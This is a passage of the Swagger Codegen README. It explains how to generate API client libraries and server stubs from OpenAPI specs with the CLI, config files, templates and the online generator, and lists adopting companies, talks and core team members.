```sh java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java ``` with a number of options. You can get the options with the `help generate` command (below only shows partal results): ``` NAME swagger-codegen-cli generate - Generate code with chosen lang SYNOPSIS swagger-codegen-cli generate [(-a <authorization> | --auth <authorization>)] [--additional-properties <additional properties>...] [--api-package <api package>] [--artifact-id <artifact id>] [--artifact-version <artifact version>] [(-c <configuration file> | --config <configuration file>)] [-D <system properties>...] [--git-repo-id <git repo id>] [--git-user-id <git user id>] [--group-id <group id>] [--http-user-agent <http user agent>] (-i <spec file> | --input-spec <spec file>) [--ignore-file-override <ignore file override location>] [--import-mappings <import mappings>...] [--instantiation-types <instantiation types>...] [--invoker-package <invoker package>] (-l <language> | --lang <language>) [--language-specific-primitives <language specific primitives>...] [--library <library>] [--model-name-prefix <model name prefix>] [--model-name-suffix <model name suffix>] [--model-package <model package>] [(-o <output directory> | --output <output directory>)] [--release-note <release note>] [--remove-operation-id-prefix] [--reserved-words-mappings <reserved word mappings>...] [(-s | --skip-overwrite)] [(-t <template directory> | --template-dir <template directory>)] [--type-mappings <type mappings>...] [(-v | --verbose)] OPTIONS -a <authorization>, --auth <authorization> adds authorization headers when fetching the swagger definitions remotely. Pass in a URL-encoded string of name:header with a comma separating multiple values ...... (results omitted) -v, --verbose verbose mode ``` You can then compile and run the client, as well as unit tests against it: ```sh cd samples/client/petstore/java mvn package ``` Other languages have petstore samples, too: ```sh ./bin/android-petstore.sh ./bin/java-petstore.sh ./bin/objc-petstore.sh ``` ### Generating libraries from your server It's just as easy--just use the `-i` flag to point to either a server or file. ### Modifying the client library format Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own. You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy. ### Making your own codegen modules If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries: ```sh java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \ -o output/myLibrary -n myClientCodegen -p com.my.company.codegen ``` This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic. You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such: ```sh java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` For Windows users, you will need to use `;` instead of `:` in the classpath, e.g. ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library: ```sh java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \ io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\ -i http://petstore.swagger.io/v2/swagger.json \ -o myClient ``` ### Where is Javascript??? See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require static code generation. There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification. :exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala. ### Generating a client from local files If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument to the code generator like this: ``` -i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json ``` Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane. ### Selective generation You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output: The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated: ```sh # generate only models java -Dmodels {opts} # generate only apis java -Dapis {opts} # generate only supporting files java -DsupportingFiles # generate models and supporting files java -Dmodels -DsupportingFiles ``` To control the specific files being generated, you can pass a CSV list of what you want: ```sh # generate the User and Pet models only -Dmodels=User,Pet # generate the User model and the supportingFile `StringUtil.java`: -Dmodels=User -DsupportingFiles=StringUtil.java ``` To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, `-DmodelTests=false` and `-DmodelDocs=false`. These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`): ```sh # generate only models (with tests and documentation) java -Dmodels {opts} # generate only models (with tests but no documentation) java -Dmodels -DmodelDocs=false {opts} # generate only User and Pet models (no tests and no documentation) java -Dmodels=User,Pet -DmodelTests=false {opts} # generate only apis (without tests) java -Dapis -DapiTests=false {opts} # generate only apis (modelTests option is ignored) java -Dapis -DmodelTests=false {opts} ``` When using selective generation, _only_ the templates needed for the specific generation will be used. ### Ignore file format Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with. The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code. Examples: ```sh # Swagger Codegen Ignore # Lines beginning with a # are comments # This should match build.sh located anywhere. build.sh # Matches build.sh in the root /build.sh # Exclude all recursively docs/** # Explicitly allow files excluded by other rules !docs/UserApi.md # Recursively exclude directories named Api # You can't negate files below this directory. src/**/Api/ # When this file is nested under /Api (excluded above), # this rule is ignored because parent directory is excluded by previous rule. !src/**/PetApiTests.cs # Exclude a single, nested file explicitly src/IO.Swagger.Test/Model/AnimalFarmTests.cs ``` The `.swagger-codegen-ignore` file must exist in the root of the output directory. Upon first code generation, you may also pass the CLI option `--ignore-file-override=/path/to/ignore_file` for greater control over generated outputs. Note that this is a complete override, and will override the `.swagger-codegen-ignore` file in an output directory when regenerating code. Editor support for `.swagger-codegen-ignore` files is available in IntelliJ via the [.ignore plugin](https://plugins.jetbrains.com/plugin/7495--ignore). ### Customizing the generator There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc: ```sh $ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/ AbstractJavaJAXRSServerCodegen.java AbstractTypeScriptClientCodegen.java ... (results omitted) TypeScriptAngularClientCodegen.java TypeScriptNodeClientCodegen.java ``` Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values. ```sh java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java \ -c path/to/config.json ``` and `config.json` contains the following as an example: ```json { "apiPackage" : "petstore" } ``` Supported config options can be different per language. Running `config-help -l {lang}` will show available options. **These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}`**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it) ```sh java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java ``` Output ``` CONFIG OPTIONS modelPackage package for generated models apiPackage package for generated api classes ...... (results omitted) library library template (sub-template) to use: jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2 jersey2 - HTTP client: Jersey client 2.6 feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3 okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0) retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2) google-api-client - HTTP client: google-api-client 1.23.0. JSON processing: Jackson 2.8.9 ``` Your config file for Java can look like ```json { "groupId":"com.my.company", "artifactId":"MyClient", "artifactVersion":"1.2.0", "library":"feign" } ``` For all the unspecified options default values will be used. Another way to override default options is to extend the config class for the specific language. To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java: ```java package com.mycompany.swagger.codegen; import io.swagger.codegen.languages.*; public class MyObjcCodegen extends ObjcClientCodegen { static { PREFIX = "HELO"; } } ``` and specify the `classname` when running the generator: ``` -l com.mycompany.swagger.codegen.MyObjcCodegen ``` Your subclass will now be loaded and overrides the `PREFIX` value in the superclass. ### Bringing your own models Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell the codegen what _not_ to create. When doing this, every location that references a specific model will refer back to your classes. Note, this may not apply to all languages... To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such: ``` --import-mappings Pet=my.models.MyPet ``` Or for multiple mappings: ``` --import-mappings Pet=my.models.MyPet,Order=my.models.MyOrder ``` or ``` --import-mappings Pet=my.models.MyPet --import-mappings Order=my.models.MyOrder ``` ### Validating your OpenAPI Spec You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example: http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json ### Generating dynamic html api documentation To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation: ```sh cd samples/dynamic-html/ npm install node . ``` Which launches a node.js server so the AJAX calls have a place to go. ### Generating static html api documentation To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem: ```sh cd samples/html/ open index.html ``` ### To build a server stub Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information. ### To build the codegen library This will create the swagger-codegen library from source. ```sh mvn package ``` Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts ## Workflow Integration ### Maven Integration You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target. ### Gradle Integration [Gradle Swagger Generator Plugin](https://github.com/int128/gradle-swagger-generator-plugin) is available for generating source code and API document. ## GitHub Integration To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example: 1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/) 2) Generate the SDK ```sh java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \ --git-user-id "wing328" \ --git-repo-id "petstore-perl" \ --release-note "Github integration demo" \ -o /var/tmp/perl/petstore ``` 3) Push the SDK to GitHub ```sh cd /var/tmp/perl/petstore /bin/sh ./git_push.sh ``` ## Online generators One can also generate API client or server using the online generators (https://generator.swagger.io) For example, to generate Ruby API client, simply send the following HTTP request using curl: ```sh curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby ``` Then you will receieve a JSON response with the URL to download the zipped code. To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body: ```json { "options": {}, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`: For example, `curl https://generator.swagger.io/api/gen/clients/python` returns ```json { "packageName":{ "opt":"packageName", "description":"python package name (convention: snake_case).", "type":"string", "default":"swagger_client" }, "packageVersion":{ "opt":"packageVersion", "description":"python package version.", "type":"string", "default":"1.0.0" }, "sortParamsByRequiredFlag":{ "opt":"sortParamsByRequiredFlag", "description":"Sort method arguments to place required parameters before optional parameters.", "type":"boolean", "default":"true" } } ``` To set package name to `pet_store`, the HTTP body of the request is as follows: ```json { "options": { "packageName": "pet_store" }, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` and here is the curl command: ```sh curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python ``` Instead of using `swaggerUrl` with an URL to the OpenAPI/Swagger spec, one can include the spec in the JSON payload with `spec`, e.g. ```json { "options": {}, "spec": { "swagger": "2.0", "info": { "version": "1.0.0", "title": "Test API" }, ... } } ``` Guidelines for Contribution --------------------------- Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) Companies/Projects using Swagger Codegen ---------------------------------------- Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page. - [Accengage](https://www.accengage.com/) - [Activehours](https://www.activehours.com/) - [Acunetix](https://www.acunetix.com/) - [Atlassian](https://www.atlassian.com/) - [Autodesk](http://www.autodesk.com/) - [Avenida Compras S.A.](https://www.avenida.com.ar) - [AYLIEN](http://aylien.com/) - [Balance Internet](https://www.balanceinternet.com.au/) - [beemo](http://www.beemo.eu) - [bitly](https://bitly.com) - [BeezUP](http://www.beezup.com) - [Box](https://box.com) - [Bufferfly Network](https://www.butterflynetinc.com/) - [Cachet Financial](http://www.cachetfinancial.com/) - [carpolo](http://www.carpolo.co/) - [CloudBoost](https://www.CloudBoost.io/) - [Cisco](http://www.cisco.com/) - [Conplement](http://www.conplement.de/) - [Cummins](http://www.cummins.com/) - [Cupix](http://www.cupix.com) - [DBBest Technologies](https://www.dbbest.com) - [DecentFoX](http://decentfox.com/) - [DocRaptor](https://docraptor.com) - [DocuSign](https://www.docusign.com) - [Elastic](https://www.elastic.co/) - [Ergon](http://www.ergon.ch/) - [Dell EMC](https://www.emc.com/) - [eureka](http://eure.jp/) - [everystory.us](http://everystory.us) - [Expected Behavior](http://www.expectedbehavior.com/) - [Fastly](https://www.fastly.com/) - [FINRA](https://github.com/FINRAOS/herd/) - [Flat](https://flat.io) - [Finder](http://en.finder.pl/) - [Fitwell](https://fitwell.co/) - [FH Münster - University of Applied Sciences](http://www.fh-muenster.de) - [Fotition](https://www.fotition.com/) - [Gear Zero Network](https://www.gearzero.ca) - [General Electric](https://www.ge.com/) - [Genesys - PureCloud](http://developer.mypurecloud.com/) - [Germin8](http://www.germin8.com) - [GigaSpaces](http://www.gigaspaces.com) - [goTransverse](http://www.gotransverse.com/api) - [GraphHopper](https://graphhopper.com/) - [Gravitate Solutions](http://gravitatesolutions.com/) - [HashData](http://www.hashdata.cn/) - [Hewlett Packard Enterprise](https://hpe.com) - [High Technologies Center](http://htc-cs.com) - [IBM](https://www.ibm.com) - [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications) - [Individual Standard IVS](http://www.individual-standard.com) - [Intent HQ](http://www.intenthq.com) - [Kabuku](http://www.kabuku.co.jp/en) - [Kurio](https://kurio.co.id) - [Kuroi](http://kuroiwebdesign.com/) - [Kuary](https://kuary.com/) - [Kubernetes](https://kubernetes.io/) - [LANDR Audio](https://www.landr.com/) - [Lascaux](http://www.lascaux.it/) - [Leanix](http://www.leanix.net/) - [Leica Geosystems AG](http://leica-geosystems.com) - [LiveAgent](https://www.ladesk.com/) - [LXL Tech](http://lxltech.com) - [Lyft](https://www.lyft.com/developers) - [MailMojo](https://mailmojo.no/) - [Metaswitch](https://www.metaswitch.com/) - [Mindera](http://mindera.com/) - [Mporium](http://mporium.com/) - [Neverfail](https://neverfail.com/) - [NTT DATA](http://www.nttdata.com/) - [nViso](http://www.nviso.ch/) - [Okiok](https://www.okiok.com) - [Onedata](http://onedata.org) - [Open International Systems](https://openintl.com/) - [OrderCloud.io](http://ordercloud.io) - [OSDN](https://osdn.jp) - [PagerDuty](https://www.pagerduty.com) - [PagerTree](https://pagertree.com) - [Pepipost](https://www.pepipost.com) - [Plexxi](http://www.plexxi.com) - [Pixoneye](http://www.pixoneye.com/) - [PostAffiliatePro](https://www.postaffiliatepro.com/) - [PracticeBird](https://www.practicebird.com/) - [Prill Tecnologia](http://www.prill.com.br) - [QAdept](http://qadept.com/) - [QuantiModo](https://quantimo.do/) - [QuickBlox](https://quickblox.com/) - [Rapid7](https://rapid7.com/) - [Red Hat](https://www.redhat.com/) - [Reload! A/S](https://reload.dk/) - [REstore](https://www.restore.eu) - [Revault Sàrl](http://revault.ch) - [Riffyn](https://riffyn.com) - [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html) - [Saritasa](https://www.saritasa.com/) - [SAS](https://www.sas.com) - [SCOOP Software GmbH](http://www.scoop-software.de) - [Shine Solutions](https://shinesolutions.com/) - [Simpfony](https://www.simpfony.com/) - [Skurt](http://www.skurt.com) - [Slamby](https://www.slamby.com/) - [SmartRecruiters](https://www.smartrecruiters.com/) - [snapCX](https://snapcx.io) - [SPINEN](http://www.spinen.com) - [Sponsoo](https://www.sponsoo.de) - [SRC](https://www.src.si/) - [Stardog Ventures](https://www.stardog.io) - [Stingray](http://www.stingray.com) - [StyleRecipe](http://stylerecipe.co.jp) - [Svenska Spel AB](https://www.svenskaspel.se/) - [Switch Database](https://www.switchdatabase.com/) - [TaskData](http://www.taskdata.com/) - [ThirdWatch.ai](https://www.thirdwatch.ai/) - [ThoughtWorks](https://www.thoughtworks.com) - [Trexle](https://trexle.com/) - [Upwork](http://upwork.com/) - [uShip](https://www.uship.com/) - [VMware](https://vmware.com/) - [Viavi Solutions Inc.](https://www.viavisolutions.com) - [W.UP](http://wup.hu/?siteLang=en) - [Wealthfront](https://www.wealthfront.com/) - [Webever GmbH](https://www.webever.de/) - [WEXO A/S](https://www.wexo.dk/) - [XSky](http://www.xsky.com/) - [Yelp](http://www.yelp.com/) - [Zalando](https://tech.zalando.com) - [ZEEF.com](https://zeef.com/) - [zooplus](https://www.zooplus.com/) Presentations/Videos/Tutorials/Books ---------------------------------------- - 2011/08/31 - [Introducing Swagger](https://www.slideshare.net/fehguy/introducing-swagger) by [Tony Tam](https://twitter.com/fehguy) - 2014/05/22 - [Swagger APIs for Humans and Robots](https://www.slideshare.net/fehguy/swagger-apis-for-humans-and-robots-gluecon) by [Tony Tam](https://twitter.com/fehguy) at [Gluecon](http://gluecon.com/) - 2014/11/11 - [Genie 2.0: Second Wish Granted!](https://medium.com/netflix-techblog/genie-2-0-second-wish-granted-d888d79455c6) by [Tom Gianos](http://www.linkedin.com/in/thomasgianos/) and [Amit Sharma](https://www.linkedin.com/pub/amit-sharma/5/163/a83) @ [Netflix](https://www.netflix.com/) Big Data Platform Team - 2015/07/28 - [Enriching RESTful Services with Swagger](https://blog.philipphauer.de/enriching-restful-services-swagger/) by [Philipp Hauer](https://blog.philipphauer.de/) - 2015/11/11 - [Generate client stubs & document your REST-API using Swagger & Spring](https://www.youtube.com/watch?v=43GhBbP--oI) by [Johannes Fiala](https://github.com/jfiala) @ Devoxx Belgium 2015 - 2015/12/03 - [こんなに簡単! Swagger Codegenのカスタマイズ](http://qiita.com/Quramy/items/c583f3213f0b77ff1bac) by [Quramy](http://qiita.com/Quramy) - 2016/01/12 - [Generate client side code using Swagger Codegen](http://rnavagamuwa.com/open-source/generate-client-side-code-using-swagger-codegen/) by [RNAVAGAMUWA](http://rnavagamuwa.com/author/admin/) - 2016/01/15 - [How to end manual REST-API client coding](https://www.youtube.com/watch?v=RzZRdqZp6Oo) by [Johannes Fiala](https://github.com/jfiala) @ dotJS 2015 - 2016/04/27 - [Automated REST API Development](https://yos.io/2016/04/27/automated-api-development/) by [Yos Riady](https://www.linkedin.com/in/yosriady) - 2016/05/29 - [Generating Java Spring-MVC code from Swagger Spec](https://www.clianz.com/2016/05/29/java-mvc-swagger-gen/) by [@icha024](https://github.com/icha024) - 2016/09/28 - [1 UNBELIEVABLE TRICK TO CREATE AN EASY TO CONSUME API IN .NET](https://stapp.space/1-simple-trick-to-create-a-good-api-in-net/) by [Piotr Stapp](https://stapp.space/author/piotr-stapp/) - 2016/10/10 - [Using swagger-codegen with Marketo](http://developers.marketo.com/blog/using-swagger-codegen-with-marketo/) by [Kenny Elkington](http://developers.marketo.com/blog/using-swagger-codegen-with-marketo/) - 2016/10/12 - [Designing a Swagger API](https://sookocheff.com/post/api/swagger/) by [Kevin Sookocheff](https://sookocheff.com/) - 2016/11/05 - [How to generate a REST Application](https://www.youtube.com/watch?v=iyC9BWMe75Q) by [Johannes Fiala](https://github.com/jfiala) @ DevFest Vienna 2016 - 2016/11/10 - [Building an AEM API clients ecosystem](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/) by Cliffano Subagio, Michael Diender, Stephen Shim from [Shine Solutions](https://shinesolutions.com/) @ [Adobe Marketing Cloud Community Expo (AMCCE)](https://www.meetup.com/Melbourne-AEM-CQ-Meetup/events/233363101/) - 2016/11/18 - [How to generate a REST CXF3 application from Swagger-Contract](https://www.slideshare.net/johannes_fiala/how-to-generate-a-rest-cxf3-application-from-swagger-apacheconeu-2016) by [Johannes Fiala](https://github.com/jfiala) @ ApacheConEU 2016 - 2016/11/25 - [Swagger Codegen for Swift3 and NodeJS](https://normand1.github.io/blog/swift/swagger/codegen/2016/11/25/Swagger-Codegen-for-Swift3-and-NodeJS.html) by [David Norman](https://github.com/normand1) - 2016/12/08 - [Generate client side code using Swagger Codegen](https://carra-lucia-ltd.co.uk/2016/12/08/generate-client-side-code-using-swagger-codegen/) by [theFerkel](https://carra-lucia-ltd.co.uk/author/theferkel/) - 2017/01/16 - [Zero to API in 4 minutes](https://cidrblock.github.io/zero-to-api-in-4-minutes.html) by [Bradley A. Thornton](https://github.com/cidrblock) - 2017/02/09 - [「Swaggerを利用した新規サービス開発」というタイトルで登壇して来ました](https://techblog.recochoku.jp/1055) by [recotech](https://www.slideshare.net/recotech) - 2017/03/03 - [Swagger Codegen の使い方の簡単な説明です](https://speakerdeck.com/wagyu298/swagger-codegen) by [wagyu298](https://github.com/wagyu298) - 2017/03/24 - [Using Open API Specification To Put Lyft SDK Support in the Fast Lane](https://medium.com/lyft-developer-platform/using-open-api-specification-to-put-lyft-sdk-support-in-the-fast-lane-7b623218e4ee) by [Val Polouchkine](https://github.com/vpolouchkine) - 2017/04/13 - [Automatically Generating your API Client with Swagger and Swagger Codegen](https://www.youtube.com/watch?v=EzKwi-u9jQo) by [Jesse Collis](https://github.com/jessedc) @ Melbourne Cocoaheads - 2017/04/27 - [Swagger Codegen のPHP実装があまりにアレだったので、ライブラリ自作して公開してみた](http://qiita.com/imunew/items/2e9c472e0097e329f2cd) by [imunew](http://qiita.com/imunew) - 2017/05/17 - [Diseño de APIs con OpenAPI](https://www.slideshare.net/pjmolina/diseo-de-apis-con-openapi) by [Pedro J. Molina](https://github.com/pjmolina) @ [JSDayES 2017](http://2017.jsday.es/) - 2017/05/22 - [Presentation of the Vert.x-Swagger project](http://vertx.io/blog/presentation-of-the-vert-x-swagger-project/) by [@phiz71](http://github.com/phiz71) - 2017/05/22 - [Automatically generating your API from a swagger file using gradle](https://www.jcore.com/2017/05/22/automatically-generating-api-using-swagger-and-gradle/) by [Deniz Turan](https://www.jcore.com/author/deniz/) - 2017/06/21 - [Swagger Presentation - Warsaw Ruby Users Group](https://www.youtube.com/watch?v=uCnnDMFQB8U) by [@rafalpetryka](http://github.com/rafalpetryka) - 2017/06/29 - [Making SDKs: the bespoke, the hopeful and the generated](https://devrel.net/developer-experience/making-sdks-bespoke-hopeful-generated) by [Tristan Sokol](https://github.com/tristansokol) ([Square](https://github.com/square)) at DevXcon 2017 - 2017/07/11 - [OpenAPI development with Python](https://www.slideshare.net/TakuroWada/20170711-euro-python2017) by [和田拓朗](https://github.com/taxpon) at [EuroPython 2017](https://ep2017.europython.eu/en/) - 2017/07/29 - [How Square makes its SDKs](https://medium.com/square-corner-blog/how-square-makes-its-sdks-6a0fd7ea4b2d) by [Tristan Sokol](https://github.com/tristansokol) ([Square](https://github.com/square)) - 2017/07/31 - [How to Generate a Deployable REST CXF3 Application from a Swagger-Contract](https://www.youtube.com/watch?v=gM63rJlUHZQ) by [Johannes Fiala](https://github.com/jfiala) @ Voxxed Days Vienna - 2017/08/11 - [Swagger Codegen 自动生成Retrofit 代码](https://juejin.im/entry/598d8eb86fb9a03c52459e2a) by [徐磊](http://www.jianshu.com/u/792c738b33fc) - 2017/08/24 - [APIs First](https://engineering.squarespace.com/blog/2017/apis-first) by [roykachouh](https://github.com/roykachouh) ([Square](https://github.com/square)) - 2017/08/31 - [Bringing Jenkins Remote Access API To The Masses](http://blog.cliffano.com/2017/09/01/jenkins-world-2017/) by [Cliffano Subagio](http://cliffano.com) from [Shine Solutions](https://shinesolutions.com/) @ [Jenkins World 2017](https://jenkinsworld20162017.sched.com/) - 2017/09/08 - [Swagger Codegen で自動生成したクライアントSDKを使う(iOS編)](http://blog.techium.jp/entry/2017/09/08/071650) by [kfurue](http://profile.hatena.ne.jp/kfurue/) - 2017/09/09 - [Swagger Codegen で自動生成したクライアントSDKを使う(RxSwift 編)](http://blog.techium.jp/entry/2017/09/09/113003) by [kfurue](http://profile.hatena.ne.jp/kfurue/) - 2017/09/09 - [OpenAPIを利用したPythonWebアプリケーション開発](https://www.slideshare.net/TakuroWada/openapipythonweb) by [和田拓朗](https://github.com/taxpon) at [PyCon JP 2017](https://pycon.jp/2017/ja/) - 2017/09/21 - [Generating an Elastic Cloud Enterprise Client](https://www.elastic.co/blog/generating-an-elastic-cloud-enterprise-client) by [Greg Marzouka](https://github.com/gmarz) ([Elastic](https://www.elastic.co/)) - 2017/09/26 - [How to Use IoT Application Enablement Api Hub JSON Descriptor in Postman and How to Generate Client Code](https://www.linkedin.com/in/radu-simen/) by [Radu Simen](https://www.linkedin.com/in/radu-simen/) ([SAP](https://www.sap.com/)) - 2017/09/28 - [Swagger Codegenで APIクライアントgem 自動生成 #m3kt](https://speakerdeck.com/juntaki/swagger-codegende-apikuraiantogem-zi-dong-sheng-cheng-number-m3kt) by [Jumpei Takiyasu](https://github.com/juntaki) - 2017/09/30 - [Swaggerのテンプレートを魔改造した話 #渋谷java](https://www.slideshare.net/int128/swagger-80309224) by [Hidetake Iwata](https://github.com/int128) ([NTT DATA Corporation](http://www.nttdata.com/global/en/)) - 2017/10/04 - [Enterprise-friendly Java client for Microsoft Machine Learning Server](https://blogs.msdn.microsoft.com/mlserver/2017/10/04/enterprise-friendly-java-client-for-microsoft-machine-learning-server/) by [Pratik Palnitkar](https://www.linkedin.com/in/pratikpalnitkar/) ([Microsoft](https://www.microsoft.com/)) - 2017/10/08 - [Generating a REST Ada client with OpenAPI and Swagger Codegen](https://blog.vacs.fr/vacs/blogs/post.html?post=2017/10/08/Generating-a-REST-Ada-client-with-OpenAPI-and-Swagger-Codegen) by [Stephane Carrez](https://github.com/stcarrez) - 2017/11/08 - [A Beginner's Guide to Code Generation for REST APIs](https://gum.co/swagger_codegen_beginner)(eBook) by [William Cheng](https://twitter.com/wing328) - 2017/11/18 - [10年前のレガシーシステムをサーバーサイドKotlinでフルリニューアルしている話 #jjug_ccc #ccc_g2](https://speakerdeck.com/maeharin/10nian-qian-falseregasisisutemuwosabasaidokotlindehururiniyuarusiteiruhua-number-jjug-ccc-number-ccc-g2) by [Hidenori Maehara](https://github.com/maeharin) # Swagger Codegen Core Team Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis. ## API Clients | Languages | Core Team (join date) | |:-------------|:-------------| | ActionScript | | | C++ | | | C# | @jimschubert (2016/05/01) | | Clojure | @xhh (2016/05/01) | | Dart | | | Groovy | | | Go | @guohuang (2016/05/01) @neilotoole (2016/05/01) | | Java | @cbornet (2016/05/01) @xhh (2016/05/01) @epaul (2016/06/04) | | Java (Spring Cloud) | @cbornet (2016/07/19) | | Kotlin | @jimschubert (2016/05/01) | | NodeJS/Javascript | @xhh (2016/05/01) | | ObjC | @mateuszmackowiak (2016/05/09) | | Perl | @wing328 (2016/05/01) | | PHP | @arnested (2016/05/01) | | Python | @scottrw93 (2016/05/01) | | Ruby | @wing328 (2016/05/01) @zlx (2016/05/22) | | Scala | | | Swift | @jaz-ah (2016/05/01) @Edubits (2016/05/01) | | TypeScript (Node) | @Vrolijkx (2016/05/01) | | TypeScript (Angular1) | @Vrolijkx (2016/05/01) | | TypeScript (Angular2) | @Vrolijkx (2016/05/01) | | TypeScript (Fetch) | | ## Server Stubs | Languages | Core Team (date joined) | |:------------- |:-------------| | C# ASP.NET5 | @jimschubert (2016/05/01) | | Go Server | @guohuang (2016/06/13) | | Haskell Servant | | | Java Spring Boot | @cbornet (2016/07/19) | | Java Spring MVC | @kolyjjj (2016/05/01) @cbornet (2016/07/19) | | Java JAX-RS | | | Java Play Framework | | | NancyFX | | | NodeJS | @kolyjjj (2016/05/01) | | PHP Lumen | @abcsun (2016/05/01) | | PHP Silex | | | PHP Slim | | | Python Flask | | | Ruby Sinatra | @wing328 (2016/05/01) | | | Scala Scalatra | | | | Scala Finch | @jimschubert (2017/01/28) | ## Template Creator Here is a list of template creators: * API Clients: * Ada: @stcarrez * Akka-Scala: @cchafer * Apex: @asnelling * Bash: @bkryza * C++ REST: @Danielku15 * C# (.NET 2.0): @who * C# (.NET Standard 1.3 ): @Gronsak * C# (.NET 4.5 refactored): @jimschubert * Clojure: @xhh * Dart: @yissachar * Elixir: @niku * Eiffel: @jvelilla * Erlang: @tsloughter * Groovy: @victorgit * Go: @wing328 * Go (rewritten in 2.3.0): @antihax * Haskell (http-client): @jonschoning * Java (Feign): @davidkiss * Java (Retrofit): @0legg * Java (Retrofit2): @emilianobonassi * Java (Jersey2): @xhh * Java (okhttp-gson): @xhh * Java (RestTemplate): @nbruno * Java (RESTEasy): @gayathrigs * Java (Vertx): @lopesmcc * Java (Google APIs Client Library): @charlescapps * Javascript/NodeJS: @jfiala * Javascript 